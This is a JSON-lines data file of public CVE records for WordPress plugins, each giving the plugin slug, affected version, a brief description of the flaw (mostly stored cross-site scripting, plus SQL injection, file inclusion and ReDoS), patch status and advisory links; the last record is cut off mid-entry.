{"CVE_ID":"CVE-2024-13896","slug":"wp-geshi-highlight","versionImpact":"1.4.3","description":"The WP-GeSHi-Highlight \u2014 rock-solid syntax highlighting for 259 languages WordPress plugin through 1.4.3 processes user-supplied input as a regular expression via the wp_geshi_filter_replace_code() function, which could lead to Regular Expression Denial of Service (ReDoS) issue","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8b622ea-e090-45ad-8755-b050fc055231\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8b622ea-e090-45ad-8755-b050fc055231\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8b622ea-e090-45ad-8755-b050fc055231\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8b622ea-e090-45ad-8755-b050fc055231\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2944","slug":"jeg-elementor-kit","versionImpact":"2.6.12","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Video Button and Countdown Widgets in all versions up to, and including, 2.6.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290315\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3290315\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7baa8cca-96a5-4d6b-86d5-53cd1a4675cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7baa8cca-96a5-4d6b-86d5-53cd1a4675cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39411","slug":"wpt-whatsapp","versionImpact":"2.2.12","description":"Improper Control of Filename for Include\/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Indie_Plugins WhatsApp Click to Chat Plugin for WordPress.This issue affects WhatsApp Click to Chat Plugin for WordPress: from n\/a through 2.2.12.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpt-whatsapp\\\/vulnerability\\\/wordpress-whatsapp-click-to-chat-plugin-for-wordpress-plugin-2-2-12-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpt-whatsapp\\\/vulnerability\\\/wordpress-whatsapp-click-to-chat-plugin-for-wordpress-plugin-2-2-12-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5813","slug":"import-products-to-wc","versionImpact":"1.2.7","description":"The Amazon Products to WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wcta2w_get_amazon_product_callback() function in all versions up to, and including, 1.2.7. This makes it possible for unauthenticated attackers to create new produces.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-products-to-wc\\\/trunk\\\/inc\\\/functions.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-products-to-wc\\\/trunk\\\/inc\\\/functions.php#L266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0906540-46fc-4f76-9265-cb87c6340fad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0906540-46fc-4f76-9265-cb87c6340fad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0147","slug":"flexible-captcha","versionImpact":"4.1","description":"The Flexible Captcha WordPress plugin through 4.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af9cbb4a-42fc-43c5-88f3-349b417f1a6a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af9cbb4a-42fc-43c5-88f3-349b417f1a6a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2184","slug":"responsive-horizontal-vertical-and-accordion-tabs","versionImpact":"1.1.15","description":"The WP Responsive Tabs horizontal vertical and accordion Tabs plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.1.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2825016%40responsive-horizontal-vertical-and-accordion-tabs%2Ftags%2F1.1.15&new=2900990%40responsive-horizontal-vertical-and-accordion-tabs%2Ftags%2F1.1.16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2825016%40responsive-horizontal-vertical-and-accordion-tabs%2Ftags%2F1.1.15&new=2900990%40responsive-horizontal-vertical-and-accordion-tabs%2Ftags%2F1.1.16\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe54c37f-1421-48aa-b502-045847d13ae3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe54c37f-1421-48aa-b502-045847d13ae3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1391","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.12","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018eae_custom_overlay_switcher\u2019 attribute of the Thumbnail Slider widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/977bab12-969d-4b15-9942-2b17c8541f61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/977bab12-969d-4b15-9942-2b17c8541f61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/bg-slider\\\/module.php#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/bg-slider\\\/module.php#L255\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/bg-slider\\\/module.php#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/bg-slider\\\/module.php#L255\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7317","slug":"folders","versionImpact":"3.0.3","description":"The Folders \u2013 Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2a2c069-5dc6-45e2-8ca1-842759d541c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2a2c069-5dc6-45e2-8ca1-842759d541c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folders\\\/tags\\\/3.0.3\\\/includes\\\/media.replace.php#L1296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folders\\\/tags\\\/3.0.3\\\/includes\\\/media.replace.php#L1296\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/folders\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/folders\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130880\\\/#file25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130880\\\/#file25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130880\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130880\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7611","slug":"enteraddons","versionImpact":"2.1.8","description":"The Enter Addons \u2013 Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' attribute of the Events Card widget in all versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7580145-03da-4aff-b804-39125e7daad1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7580145-03da-4aff-b804-39125e7daad1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enteraddons\\\/trunk\\\/widgets\\\/events_card\\\/traits\\\/Templates_Components.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enteraddons\\\/trunk\\\/widgets\\\/events_card\\\/traits\\\/Templates_Components.php#L25\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8288","slug":"guten-post-layout","versionImpact":"1.2.4","description":"The Guten Post Layout \u2013 An Advanced Post Grid Collection for WordPress Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 attribute within the 'wp:guten-post-layout\/post-grid' Gutenberg block in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d6d9852-424a-4d98-9926-e849bef99c2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d6d9852-424a-4d98-9926-e849bef99c2d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guten-post-layout\\\/trunk\\\/src\\\/blocks\\\/post-grid\\\/post-grid.php#L300\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guten-post-layout\\\/trunk\\\/src\\\/blocks\\\/post-grid\\\/post-grid.php#L300\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/guten-post-layout\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/guten-post-layout\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guten-post-layout\\\/trunk\\\/src\\\/blocks\\\/post-grid\\\/post-grid.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guten-post-layout\\\/trunk\\\/src\\\/blocks\\\/post-grid\\\/post-grid.php#L27\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11231","slug":"mshop-npay","versionImpact":"3.3.7","description":"The ???? ????? plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mnp_purchase shortcode in all versions up to, and including, 3.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-npay\\\/trunk\\\/templates\\\/shortcodes\\\/naverpay-button.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-npay\\\/trunk\\\/templates\\\/shortcodes\\\/naverpay-button.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191814\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191814\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mshop-npay\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mshop-npay\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dab587c3-54f3-4619-8de0-8740d6451f96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dab587c3-54f3-4619-8de0-8740d6451f96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11430","slug":"sql-chart-builder","versionImpact":"2.3.7.1","description":"The SQL Chart Builder plugin for WordPress is vulnerable to SQL Injection via the 'arg1' arg of the 'gvn_schart_2' shortcode in all versions up to, and including, 2.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sql-chart-builder\\\/tags\\\/2.3.6\\\/functions.php#L469\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sql-chart-builder\\\/tags\\\/2.3.6\\\/functions.php#L469\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f818aad-8d05-4665-a7dc-50bc56cbde5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f818aad-8d05-4665-a7dc-50bc56cbde5f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13400","slug":"kona-instagram-feed-for-gutenberg","versionImpact":"1.7","description":"The Kona Gallery Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \"Kona: Instagram for Gutenberg\" Block, specifically in the \"align\" attribute, in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kona-instagram-feed-for-gutenberg\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kona-instagram-feed-for-gutenberg\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e90045df-deb5-41ab-a285-c6b1573ae0f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e90045df-deb5-41ab-a285-c6b1573ae0f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13609","slug":"1-click-migration","versionImpact":"2.2","description":"The 1 Click WordPress Migration Plugin \u2013 100% FREE for a limited time plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1 via the class-ocm-backup.php. This makes it possible for unauthenticated attackers to extract sensitive data including usernames and their respective password hashes during a short window of time in which the backup is in process.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-click-migration\\\/trunk\\\/inc\\\/backup\\\/class-ocm-backup.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-click-migration\\\/trunk\\\/inc\\\/backup\\\/class-ocm-backup.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d33199ea-7c96-4c60-a7b8-5c7e9835e231?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d33199ea-7c96-4c60-a7b8-5c7e9835e231?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39409","slug":"wp-video-robot","versionImpact":"1.20.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pressaholic WordPress Video Robot - The Ultimate Video Importer.This issue affects WordPress Video Robot - The Ultimate Video Importer: from n\/a through 1.20.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-video-robot\\\/vulnerability\\\/wordpress-wordpress-video-robot-the-ultimate-video-importer-plugin-1-20-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-video-robot\\\/vulnerability\\\/wordpress-wordpress-video-robot-the-ultimate-video-importer-plugin-1-20-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0146","slug":"naver-map","versionImpact":"1.1.0","description":"The Naver Map WordPress plugin through 1.1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1218c69-4f6a-4b2d-a537-5cc16a46ba7b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1218c69-4f6a-4b2d-a537-5cc16a46ba7b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0520","slug":"rapidexpcart","versionImpact":"1.0","description":"The RapidExpCart WordPress plugin through 1.0 does not sanitize and escape the url parameter in the rapidexpcart endpoint before storing it and outputting it back in the page, leading to a Stored Cross-Site Scripting vulnerability which could be used against high-privilege users such as admin, furthermore lack of csrf protection means an attacker can trick a logged in admin to perform the attack by submitting a hidden form.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be4f7ff9-af79-477b-9f47-e40e25a3558e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be4f7ff9-af79-477b-9f47-e40e25a3558e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2159","slug":"cmp-coming-soon-maintenance","versionImpact":"4.1.7","description":"The CMP \u2013 Coming Soon & Maintenance plugin for WordPress is vulnerable to Maintenance Mode Bypass in versions up to, and including, 4.1.7. A correct cmp_bypass GET parameter in the URL (equal to the md5-hashed home_url in the default setting) allows users to visit a site placed in maintenance mode thus bypassing the plugin's provided feature.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2900571\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.8\\\/cmp-advanced.php?old=2873620&old_path=cmp-coming-soon-maintenance%2Ftags%2F4.1.7%2Fcmp-advanced.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2900571\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.8\\\/cmp-advanced.php?old=2873620&old_path=cmp-coming-soon-maintenance%2Ftags%2F4.1.7%2Fcmp-advanced.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af955f69-b18c-446e-b05e-6a57a5f16dfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af955f69-b18c-446e-b05e-6a57a5f16dfa?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.6\\\/niteo-cmp.php#L808\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.6\\\/niteo-cmp.php#L808\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24433","slug":"simple-sortsearch","versionImpact":"0.0.3","description":"The simple sort&search WordPress plugin through 0.0.3 does not make sure that the indexurl parameter of the shortcodes \"category_sims\", \"order_sims\", \"orderby_sims\", \"period_sims\", and \"tag_sims\" use allowed URL protocols, which can lead to stored cross-site scripting by users with a role as low as Contributor","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ce8c786-ba82-427c-b5e7-e3b300a24c5f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ce8c786-ba82-427c-b5e7-e3b300a24c5f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1791","slug":"wp-codemirror-block","versionImpact":"1.2.4","description":"The CodeMirror Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Code Mirror block in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52569aac-1e9e-40fb-9ff4-5eeb7940375d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52569aac-1e9e-40fb-9ff4-5eeb7940375d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-codemirror-block\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-codemirror-block\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4608","slug":"sellkit","versionImpact":"1.9.8","description":"The SellKit \u2013 Funnel builder and checkout optimizer for WooCommerce to sell more, faster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fbb31a5-9ed2-445a-b309-a9835128eb44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fbb31a5-9ed2-445a-b309-a9835128eb44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/fields\\\/acceptance.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/fields\\\/acceptance.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/fields\\\/field-base.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/fields\\\/field-base.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/widgets\\\/optin.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/widgets\\\/optin.php#L48\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5503","slug":"wp-blog-post-layouts","versionImpact":"1.1.3","description":"The WP Blog Post Layouts plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.3. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5205cc95-06d1-4bc6-a9ea-082df9566935?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5205cc95-06d1-4bc6-a9ea-082df9566935?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L883\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L883\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L900\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L900\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L917\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L917\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/grid\\\/element.php#L1146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/grid\\\/element.php#L1146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/list\\\/element.php#L1136\",\"name\":\"https:\\\/\